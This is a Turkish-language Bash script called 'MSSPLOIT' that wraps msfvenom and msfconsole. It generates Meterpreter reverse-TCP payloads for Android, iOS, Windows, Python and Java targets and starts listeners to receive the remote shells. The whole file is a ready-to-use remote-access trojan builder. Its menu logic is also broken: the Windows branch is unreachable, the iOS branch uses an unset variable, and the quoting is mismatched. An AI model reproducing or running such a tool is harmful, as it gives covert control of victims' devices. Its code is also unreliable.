#!/bin/bash
# Author: He4LAN

clear

banner(){
echo -e "\e[32m


    _____         _     _ _      _____     _           ___             
   |   __|_ _ ___| |___|_| |_   |     |___| |_ ___ ___|  _|___ ___ ___ 
   |   __|_'_| . | | . | |  _|  |-   -|   |  _| -_|  _|  _| .'|  _| -_|
   |_____|_,_|  _|_|___|_|_|    |_____|_|_|_| |___|_| |_| |__,|___|___|
      	     |_|                                                       
                                                                                                  
         
         " 
	echo -e '  	  \033[33mAuthor:    \e[32mHe4LAN\e[0m\e[31m V1.0\e[0m'
	echo ""
	echo -e '  	  \033[33mINSTAGRAM: \e[32;40;4minstagram.com/he4lan\e[0m'
	echo -e '	  \033[33mGITHUB:    \e[32;40;4mgithub.com/He4LAN\e[0m



   \e[31m[\e[37m01\e[31m]\e[37m Android

   \e[31m[\e[37m02\e[31m]\e[37m Apple \e[31m[\e[0m ʙᴇᴛᴀ! \e[31m]\e[0m

   \e[31m[\e[37m03\e[31m]\e[37m Windows 
	
   \e[31m[\e[37m04\e[31m]\e[37m Linux  
	
   \e[31m[\e[37m05\e[31m]\e[37m MacOs 


   \e[31m[\e[37m00\e[31m]\e[37m Çıkış
    
   \e[31m[\e[37m99\e[31m]\e[37m Menüye dön 
    

'   

	read -p $' \e[31m[\e[32m+\e[31m]\e[37m Bir sistem seçin : \e[31m' yapi

}

banner

if [[ $yapi == 01 ||  $yapi == 1  ]]; then


			echo " "
			echo -e "\e[32m  [\033[31m1\e[32m]\e[0m TCP
  \e[32m[\033[31m2\e[32m]\e[0m UDP (FOR DEVS)       
                    "
			read -p $'                   >\033[31m ' portx

#--- Android :) ---------------------------------------

		if [[ $portx == "1" || $portx == "01" ]]; then
			sleep 1
			clear
			echo " "
			echo -e "\033[31m
  \033[31;4mMSSPLOIT\033[0m\033[31m

    * 
  *  ***  
   **    *

   **     
      *  *
  	 *       
        
       *  
     *          
    * \e[0m

 Lütfen tam deneyim için WIFI açın.

"
			read -p $'\e[31m[\e[32m+\e[31m]\e[37m Ip Adresi : ' ip
			echo -e ""
			read -p $'\e[31m[\e[32m+\e[31m]\e[37m Port : ' port
			echo -e ""
			read -p $'\e[31m[\e[32m+\e[31m]\e[37m Exploit Adı : ' token
			msfvenom -p android/meterpreter/reverse_tcp lhost=$ip lport=$port > /sdcard/$token.apk
			clear
			sleep 2
			echo ""
			echo -e '\e[37m
			\e[31m[\e[32m+\e[31m]\e[0m Exploit Oluşturuldu --> /sdcard/'$token'.apk
			
			'
			msfconsole -q -x " use exploit/multi/handler; set payload android/meterpreter/reverse_tcp;  set lhost $ip ; set lport $port ; exploit ;"


		else
			sleep 1
			clear
			echo " "
			echo -e "\033[31m
  \033[31;4mMSSPLOIT\033[0m\033[31m

    * 
  *  ***  
   **    *

   **     
      *  *
  	 *       
        
       *  
     *          
    * \e[0m

 Lütfen tam deneyim için WIFI açın.
"
			read -p $'\e[31m[\e[32m+\e[31m]\e[37m IP Adresi : ' ip
			echo -e ""
			read -p $'\e[31m[\e[32m+\e[31m]\e[37m Port : ' port
			echo -e ""
			read -p $'\e[31m[\e[32m+\e[31m]\e[37m Exploit Adı : ' token
			msfvenom -p android/meterpreter/reverse_tcp lhost=$ip lport=$port > /sdcard/$token.apk
			clear
			sleep 2
			echo ""
			echo -e '\e[37m
			\e[31m[\e[32m+\e[31m]\e[0m Exploit Oluşturuldu --> /sdcard/'$token'.apk
			
			'
			msfconsole -q -x " use exploit/multi/handler; set payload android/meterpreter/reverse_tcp;  set lhost localhost ; set lport 4444 ; exploit ;"

		fi

#--- Apple :) ---------------------------------------



elif [[ $yapi == 02 ||  $yapi == 2  ]]; then


	echo " "
	echo -e "\e[32m  [\033[31m1\e[32m]\e[0m TCP
  \e[32m[\033[31m2\e[32m]\e[0m UDP (FOR DEVS)       
                    "
	read -p $'                   >\033[31m ' portx

		if [[ $port == "1" ]]; then
			
			sleep 2
			clear
			echo " "
			echo -e "\033[31m
  \033[31;4mMSSPLOIT\033[0m\033[31m

    * 
  *  ***  
   **    *

   **     
      *  *
  	 *       
        
       *  
     *          
    * \e[0m

 Lütfen tam deneyim için WIFI açın.
"
			read -p $'\e[31m[\e[32m+\e[31m]\e[37m Ip Adresi : ' ip
			echo -e ""
			read -p $'\e[31m[\e[32m+\e[31m]\e[37m Exploit Adı : ' token
			msfvenom -p apple_ios/aarch64/meterpreter_reverse_tcp LHOST=$LHOST LPORT=4444 -f macho -o out
			clear
			sleep 2
			echo ""
			echo -e '\e[37m
			\e[31m[\e[32m+\e[31m]\e[0m Exploit Oluşturuldu --> /sdcard/'$token'.ipa
			
			'
			msfconsole -q -x " use exploit/multi/handler; set payload apple_ios/aarch64/meterpreter_reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j”; chmod +x out; brew install ldid; ldid -S out;"

		else
			sleep 2
			clear
			echo " "
			echo -e "\033[31m
  \033[31;4mMSSPLOIT\033[0m\033[31m

    * 
  *  ***  
   **    *

   **     
      *  *
  	 *       
        
       *  
     *          
    * \e[0m

 Lütfen tam deneyim için WIFI açın.
"
			echo -e ""
			read -p $'\e[31m[\e[32m+\e[31m]\e[37m IP Adresi : ' ip
			echo -e ""
			read -p $'\e[31m[\e[32m+\e[31m]\e[37m Port : ' port
			echo -e ""
			read -p $'\e[31m[\e[32m+\e[31m]\e[37m Exploit Adı : ' token
			msfvenom -p apple_ios/aarch64/meterpreter_reverse_tcp LHOST=$LHOST LPORT=4444 -f macho -o out
			clear
			sleep 2
			echo ""
			echo -e '\e[37m
			\e[31m[\e[32m+\e[31m]\e[0m Exploit Oluşturuldu --> /sdcard/'$token'.ipa
			
			'
			msfconsole -q -x " use exploit/multi/handler; set payload apple_ios/aarch64/meterpreter_reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j”; chmod +x out; brew install ldid; ldid -S out;"

		fi



#--- Windows :) --------------------------

elif [[ $yapi == 02 ||  $yapi == 2  ]]; then



	echo " "
	echo -e "\e[32m  [\033[31m1\e[32m]\e[0m TCP
  \e[32m[\033[31m2\e[32m]\e[0m UDP (FOR DEVS)       
                    "
	read -p $'                   >\033[31m ' portx

		if [[ $portx == "1" || $portx == "01" ]]; then
			
			sleep 2
			clear
			echo " "
			echo -e "\033[31m
  \033[31;4mMSSPLOIT\033[0m\033[31m

    * 
  *  ***  
   **    *

   **     
      *  *
  	 *       
        
       *  
     *          
    * \e[0m

 Lütfen tam deneyim için WIFI açın.
"
			echo -e ""
			read -p $'\e[31m[\e[32m+\e[31m]\e[37m IP Adresi : ' ip
			echo -e ""
			read -p $'\e[31m[\e[32m+\e[31m]\e[37m Port : ' port
			echo -e ""
			read -p $'\e[31m[\e[32m+\e[31m]\e[37m Exploit Adı : ' token
			msfvenom -p windows/meterpreter/reverse_tcp lhost=$ip lport=$port -f exe >  /sdcard/$token.exe
			clear
			sleep 2
			echo ""
			echo -e '\e[37m
			\e[31m[\e[32m+\e[31m]\e[0m Exploit Oluşturuldu --> /sdcard/'$token'.exe
			
			'
			msfconsole -q -x " use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp;  set lhost $ip ; set lport $port ; exploit ;"


		else
			sleep 2
			clear
			echo " "
			echo -e "\033[31m
  \033[31;4mMSSPLOIT\033[0m\033[31m

    * 
  *  ***  
   **    *

   **     
      *  *
  	 *       
        
       *  
     *          
    * \e[0m

 Lütfen tam deneyim için WIFI açın.
"
			echo -e ""
			read -p $'\e[31m[\e[32m+\e[31m]\e[37m IP Adresi : ' ip
			echo -e ""
			read -p $'\e[31m[\e[32m+\e[31m]\e[37m Port : ' port
			echo -e ""
			read -p $'\e[31m[\e[32m+\e[31m]\e[37m Exploit Adı : ' token
			msfvenom -p windows/meterpreter/reverse_tcp lhost=$ip lport=$port -f exe >  /sdcard/$token.exe
			clear
			sleep 2
			echo ""
			echo -e '\e[37m
			\e[31m[\e[32m+\e[31m]\e[0m Exploit Oluşturuldu --> /sdcard/'$token'.exe
			
			'
			msfconsole -q -x " use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp;  set lhost localhost ; set lport 4444 ; exploit ;"

		fi


#--- Linux :) --------------------


elif [[ $yapi == 03 ||  $yapi == 3  ]]; then



	echo " "
	echo -e "\e[32m  [\033[31m1\e[32m]\e[0m TCP
  \e[32m[\033[31m2\e[32m]\e[0m UDP (FOR DEVS)       
                    "
	read -p $'                   >\033[31m ' portx

		if [[ $portx == "1" || $portx == "01" ]]; then
			sleep 2
			clear
			echo " "
			echo -e "\033[31m
  \033[31;4mMSSPLOIT\033[0m\033[31m

    * 
  *  ***  
   **    *

   **     
      *  *
  	 *       
        
       *  
     *          
    * \e[0m

 Lütfen tam deneyim için WIFI açın.
"
			echo -e ""
			read -p $'\e[31m[\e[32m+\e[31m]\e[37m IP Adresi : ' ip
			echo -e ""
			read -p $'\e[31m[\e[32m+\e[31m]\e[37m Port : ' port
			echo -e ""
			read -p $'\e[31m[\e[32m+\e[31m]\e[37m Exploit Adı : ' token
			msfvenom -p python/meterpreter/reverse_tcp lhost=$ip lport=$port >  /sdcard/$token.py
			clear
			sleep 2
			echo ""
			echo -e '\e[37m
			\e[31m[\e[32m+\e[31m]\e[0m Exploit Oluşturuldu --> /sdcard/'$token'.py
			
			'
			msfconsole -q -x " use exploit/multi/handler; set payload python/meterpreter/reverse_tcp;  set lhost $ip ; set lport $port ; exploit ;"



		else
			sleep 2
			clear
			echo " "
			echo -e "\033[31m
  \033[31;4mMSSPLOIT\033[0m\033[31m

    * 
  *  ***  
   **    *

   **     
      *  *
  	 *       
        
       *  
     *          
    * \e[0m

 Lütfen tam deneyim için WIFI açın.
"
			echo -e ""
			read -p $'\e[31m[\e[32m+\e[31m]\e[37m IP Adresi : ' ip
			echo -e ""
			read -p $'\e[31m[\e[32m+\e[31m]\e[37m Port : ' port
			echo -e ""
			read -p $'\e[31m[\e[32m+\e[31m]\e[37m Exploit Adı : ' token
			msfvenom -p python/meterpreter/reverse_tcp lhost=$ip lport=$port >  /sdcard/$token.py
			clear
			sleep 2
			echo ""
			echo -e '\e[37m
			\e[31m[\e[32m+\e[31m]\e[0m Exploit Oluşturuldu --> /sdcard/'$token'.py
			
			'
			msfconsole -q -x " use exploit/multi/handler; set payload python/meterpreter/reverse_tcp;  set lhost localhost ; set lport 4444 ; exploit ;"

			
		fi


#-- MacOs :) -------------------------



elif [[ $yapi == 04 ||  $yapi == 4  ]]; then

	echo " "
	echo -e "\e[32m  [\033[31m1\e[32m]\e[0m TCP
  \e[32m[\033[31m2\e[32m]\e[0m UDP (FOR DEVS)       
                    "
	read -p $'                   >\033[31m ' portx

		if [[ $portx == "1" || $portx == "01" ]]; then
			sleep 2
			clear
			echo " "
			echo -e "\033[31m
  \033[31;4mMSSPLOIT\033[0m\033[31m

    * 
  *  ***  
   **    *

   **     
      *  *
  	 *       
        
       *  
     *          
    * \e[0m

 Lütfen tam deneyim için WIFI açın.
"
			echo -e ""
			read -p $'\e[31m[\e[32m+\e[31m]\e[37m IP Adresi : ' ip
			echo -e ""
			read -p $'\e[31m[\e[32m+\e[31m]\e[37m Port : ' port
			echo -e ""
			read -p $'\e[31m[\e[32m+\e[31m]\e[37m Exploit Adı : ' token
			msfvenom -p java/meterpreter/reverse_tcp lhost=$ip lport=$port -f jar >  /sdcard/$token.jar
			clear
			sleep 2
			echo ""
			echo -e '\e[37m
			\e[31m[\e[32m+\e[31m]\e[0m Exploit Oluşturuldu --> /sdcard/'$token'.jar
			
			'
			msfconsole -q -x " use exploit/multi/handler; set payload java/meterpreter/reverse_tcp;  set lhost $ip ; set lport $port ; exploit ;"


		else
			sleep 2
			clear
			echo " "
			echo -e "\033[31m
  \033[31;4mMSSPLOIT\033[0m\033[31m

    * 
  *  ***  
   **    *

   **     
      *  *
  	 *       
        
       *  
     *          
    * \e[0m

 Lütfen tam deneyim için WIFI açın.
"
			echo -e ""
			read -p $'\e[31m[\e[32m+\e[31m]\e[37m IP Adresi : ' ip
			echo -e ""
			read -p $'\e[31m[\e[32m+\e[31m]\e[37m Port : ' port
			echo -e ""
			read -p $'\e[31m[\e[32m+\e[31m]\e[37m Exploit Adı : ' token
			msfvenom -p java/meterpreter/reverse_tcp lhost=$ip lport=$port -f jar >  /sdcard/$token.jar
			clear
			sleep 2
			echo ""
			echo -e '\e[37m
			\e[31m[\e[32m+\e[31m]\e[0m Exploit Oluşturuldu --> /sdcard/'$token'.jar
			
			'
			msfconsole -q -x " use exploit/multi/handler; set payload java/meterpreter/reverse_tcp;  set lhost localhost ; set lport 4444 ; exploit ;"

			
		fi


	elif [[ $yapi == 00 ||  $yapi == 0  ]]; then
	    echo " "
		echo -e "\e[37m Tekrar görüşmek üzere :)"
		sleep 1
		clear
		exit
	else
		echo " "
		echo -e "\e[37m  Hatalı seçim yaptınız!"
		sleep 2
		bash mssploit.sh
	fi